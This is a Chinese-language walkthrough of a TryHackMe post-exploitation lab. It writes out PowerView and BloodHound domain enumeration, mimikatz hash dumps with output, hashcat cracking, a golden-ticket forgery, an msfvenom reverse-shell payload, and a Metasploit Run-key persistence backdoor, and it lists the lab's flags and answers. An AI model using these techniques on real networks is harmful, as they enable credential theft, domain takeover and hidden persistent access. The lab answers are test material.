Post-Exploitation Basics(後滲透基礎)

# Post-Exploitation Basics(後滲透基礎) ###### tags: `TryHackMe` `Powerview` `Mimikatz` `Bloodhound` 實驗房間:https://tryhackme.com/room/postexploit ### opevpn ``` sudo openvpn 下載好的vpn ``` ### 官方給出了你的身分和目標IP ``` Your machine IP is MACHINE_IP Username: Administrator Password: P@$$W0rd Domain Name: CONTROLLER 10.10.173.144 ``` ### ssh 獲得 shell ``` ssh Administrator@10.10.173.144 ``` ### 啟動Powershell 繞過powershell的執行策略讓你輕鬆運行腳本 ``` powershell -ep bypass -ep ``` ### PowerShell的執行策略以及繞過方法: https://www.jianshu.com/p/3c2f048b2870 ### Powerview 是一個強大的 powershell 腳本用於枚舉域。(注意.後面要空格) ``` . .\Downloads\PowerView.ps1 如果無法執行加上以下: Import-Module .\PowerView.ps1 ``` ### cheatsheet: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview ### 枚舉域用戶 ``` Get-NetUser | select cn ``` ### 枚舉域組 ``` Get-NetGroup -GroupName *admin* ``` ### 枚舉共享 ``` Invoke-ShareFinder ``` ### 枚舉域中的操作系統 ``` Get-NetComputer -fulldata | select operatingsystem ``` ### 枚舉 kerbroastable 用戶 ``` Get-NetUser -SPN | select cn ``` ### 答題卡: ``` 默認沒有設置的共享文件夾是什麼？ Share 除了 Windows Server 2019，網絡內部運行的是什麼操作系統？ Windows 10 Enterprise Evaluation 我在用戶內部隱藏了一個標誌找到它 POST{P0W3RV13W_FTW} ``` ## Bloodhound 是一個圖形界面，可讓您直觀地繪製網絡圖。該工具與類似於 PowerView 的 SharpHound 一起獲取網絡的用戶、組、信任等，並將它們收集到 .json 文件中，以便在 Bloodhound 內部使用實驗環境下所提供的腳本版本和最新的BloodHound 會報錯解決方法：使用最新版的BloodHound和neo4j，那就需要最新版的SharpHound ，我們上傳一個最新版的SharpHound .exe文件到目標機上。那就需要最新版的SharpHound: ``` https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe ``` ### BloodHound 安装 ``` apt-get install bloodhound ``` ### neo4j 圖形化數據庫 ``` neo4j console ``` ### 預設帳戶密碼: ``` neo4j: neo4j ``` ### 預設服務端口: ``` http://localhost:7474/ ``` 登入後修改密碼就完成(BloodHound使用之前需要開啟neo4j ) 因為實驗環境下目標機上的SharpHound 腳本和最新版的BloodHound 並不兼容，所以此處使用我們之前上傳的SharpHound.exe文件收集目標域信息。 ### scp 複製到目標機器 ``` scp SharpHound.exe Administrator@10.10.173.144:SharpHound.exe ``` ### 收集數據打包zip ``` ./SharpHound.exe --collectionmethods All --domain CONTROLLER.local --zipfilename loot.zip ``` ### 目標機產生 zip後複製到攻擊機 ``` scp Administrator@10.10.173.144:20230406061102_loot.zip ``` ### 打開 BloodHound 1.會進入一個圖型化介面，使用上傳的方式上傳zip檔，用匯入會失敗。 2.接者左邊會有一個菜單，可以瀏覽分析資訊以上都做到的話，就可以答題了。 ### 答題卡: ``` 什麼服務也是域管理員 SQLSERVICE 哪兩個用戶是 Kerberoastable 的？ SQLSERVICE, KRBTGT ``` ## Mimikatz 是一種非常流行且功能強大的後期開發工具，主要用於在活動目錄網絡中轉儲用戶憑據我們將專注於使用 mimikatz 轉儲 NTLM 哈希，然後使用 hashcat 破解這些哈希 ``` mimikatz.exe privilege::debug ``` 確保輸出為“Privilege '20' ok”——這確保您以管理員身份運行 mimikatz；如果您不以管理員身份運行 mimikatz，mimikatz 將無法正常運行 ### 轉儲哈希值 ``` lsadump::lsa /patch ``` ``` RID : 000001f4 (500) User : Administrator LM : NTLM : 2777b7fec870e04dda00cd7260f7bee6 RID : 000001f5 (501) User : Guest LM : NTLM : RID : 000001f6 (502) User : krbtgt LM : NTLM : 5508500012cc005cf7082a9a89ebdfdf RID : 0000044f (1103) User : Machine1 LM : NTLM : 64f12cddaa88057e06a81b54e73b949b RID : 00000451 (1105) User : Admin2 LM : NTLM : 2b576acbe6bcfda7294d6bd18041b8fe RID : 00000452 (1106) User : Machine2 LM : NTLM : c39f2beb3d2ec06a62cb887fb391dee0 RID : 00000453 (1107) User : SQLService LM : NTLM : f4ab68f27303bcb4024650d8fc5f973a RID : 00000454 (1108) User : POST LM : NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2 RID : 00000457 (1111) User : sshd LM : NTLM : 2777b7fec870e04dda00cd7260f7bee6 RID : 000003e8 (1000) User : DOMAIN-CONTROLL$ LM : NTLM : df17ce14150323494d483ddcf914431d RID : 00000455 (1109) User : DESKTOP-2$ LM : NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c RID : 00000456 (1110) User : DESKTOP-1$ LM : NTLM : 7d33346eeb11a4f12a6c201faaa0d89a ``` ### hashcat 跑字典 ``` hashcat -m 1000 yourxxxhash rockyou.txt ``` -m 1000代表 NTLM 加密 window 大多數採用 ### 答題卡: ``` Machine1 密碼是什麼？ Password1 什麼是 Machine2 哈希？ c39f2beb3d2ec06a62cb887fb391dee0 ``` ### mimikatz 的金票攻擊再次使用與上一個任務相同的工具；然而，這次我們將使用它來創建一張金票。我們將首先轉儲 krbtgt 用戶的哈希和 sid，然後創建一張金票，並使用該金票打開一個新的命令提示符，允許我們訪問網絡上的任何機器。 ``` mimikatz.exe privilege::debug lsadump::lsa /inject /name:krbtgt 這會轉儲 Kerberos Ticket Granting Ticket 帳戶的哈希和安全標識符，允許您創建黃金票證 ``` ``` Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 RID : 000001f6 (502) User : krbtgt * Primary NTLM : 5508500012cc005cf7082a9a89ebdfdf LM : Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf lm - 0: 372f405db05d3cafd27f8e6a4a097b2c * WDigest 01 49a8de3b6c7ae1ddf36aa868e68cd9ea 02 7902703149b131c57e5253fd9ea710d0 03 71288a6388fb28088a434d3705cc6f2a 04 49a8de3b6c7ae1ddf36aa868e68cd9ea 05 7902703149b131c57e5253fd9ea710d0 06 df5ad3cc1ff643663d85dabc81432a81 07 49a8de3b6c7ae1ddf36aa868e68cd9ea 08 a489809bd0f8e525f450fac01ea2054b 09 19e54fd00868c3b0b35b5e0926934c99 10 4462ea84c5537142029ea1b354cd25fa 11 6773fcbf03fd29e51720f2c5087cb81c 12 19e54fd00868c3b0b35b5e0926934c99 13 52902abbeec1f1d3b46a7bd5adab3b57 14 6773fcbf03fd29e51720f2c5087cb81c 15 8f2593c344922717d05d537487a1336d 16 49c009813995b032cc1f1a181eaadee4 17 8552f561e937ad7c13a0dca4e9b0b25a 18 cc18f1d9a1f4d28b58a063f69fa54f27 19 12ae8a0629634a31aa63d6f422a14953 20 b6392b0471c53dd2379dcc570816ba10 21 7ab113cb39aa4be369710f6926b68094 22 7ab113cb39aa4be369710f6926b68094 23 e38f8bc728b21b85602231dba189c5be 24 4700657dde6382cd7b990fb042b00f9e 25 8f46d9db219cbd64fb61ba4fdb1c9ba7 26 36b6a21f031bf361ce38d4d8ad39ee0f 27 e69385ee50f9d3e105f50c61c53e718e 28 ca006400aefe845da46b137b5b50f371 29 15a607251e3a2973a843e09c008c32e3 * Kerberos Default Salt : CONTROLLER.LOCALkrbtgt Credentials des_cbc_md5 : 64ef5d43922f3b5d * Kerberos-Newer-Keys Default Salt : CONTROLLER.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d aes128_hmac (4096) : 7eb35bddd529c0614e5ad9db4c798066 des_cbc_md5 (4096) : 64ef5d43922f3b5d * NTLM-Strong-NTOWF Random Value : 666caaaaf30081f30211bd7fa445fec4 ---------------------------------------------------------------------------- ``` ### 範例 ``` kerberos::golden /user: /domain: /sid: /krbtgt: /id: kerberos::golden /user:Administrator /domain:CONTROLLER.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 ``` id:500 這裡不知道為啥(之後在研究) * 此處要在攻擊機上通過RDP遠程連接到目標機，並且通過RDP遠程操作完成整個金票攻擊過程，才能在目標機器上看到一個打開的新的命令提示符界面（使用ssh連接目標機進行操作無法看到效果）。 ### 使用 RDP連接到虛擬機： ``` rdesktop -u Administrator -d CONTROLLER 10.10.173.144 ``` ### 以上金票攻擊步驟最後彈出新的cmd ``` misc::cmd - 這將打開一個新的命令提示符，對所有機器都具有提升的權限 ``` 現在你將擁有另一個命令提示符界面，可以讓你訪問該局域網絡上的所有其他計算機注意：由於 tryhackme 當前不支持網絡，在本次實驗環境下將無法訪問其他機器。 ### 服務器管理器的枚舉 --- 這是 Windows 服務器管理器在您第一次打開它時的外觀最有趣的主要選項卡是工具和管理選項卡，您可以在工具選項卡中找到大部分信息，例如用戶、組、信任、計算機。管理選項卡將允許您添加角色和功能，但這可能會被系統管理員相對快速地接受。不要擔心AD CS、AD DS、DNS 或文件和存儲服務，它們是為利用活動目錄而設置的，對後期利用沒有多大用處 --- ### 導航到工具選項卡並選擇 Active Directory 用戶和計算機找到sql service 用戶的描述 * 一些系統管理員沒有意識到您作為攻擊者可以看到用戶帳戶的描述，因此他們可能會在描述中設置服務帳戶密碼查看描述並找到 SQL 服務密碼是什麼答題卡: ``` 什麼工具可以查看事件日誌？ (Windows 服务器管理器 tool選項卡) Event Viewer 什麼是 SQL 服務密碼 MYpassword123# ``` # metasploit 維持訪問 ``` 反向shell payload msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe 複製到目標機 scp shell.exe Administrator@10.10.173.144:shell.exe 開啟 msfconsole msfconsole -q use exploit/multi/handler 設置 payload set payload windows/meterpreter/reverse_tcp run ``` ### 目標機上打開 shell.exe 就會反彈 meterpreter shell，然後我們將在其中運行持久性模塊。 ``` bg 回到 background use exploit/windows/local/persistence 此模塊每 10 秒發送一次有效負載 sessions 查看會話 set session xxx run ``` ### 分析後門創建過程： ``` 1.寫入VBS 腳本到目標機的C:\Users\Administrator\AppDats\Local\Temp\UKtAHmUJLNPK.vbs 2.安裝VBS腳本對應的註冊表文件SfKxXfe（放在Run文件夾下）並設置為開機自動運行 3.清理後門創建過程中產生的和日誌相關的RC（資源）文件 ``` ### 參考: https://www.cnblogs.com/Hekeats-L/p/16810537.html https://tryhackme.com/room/postexploit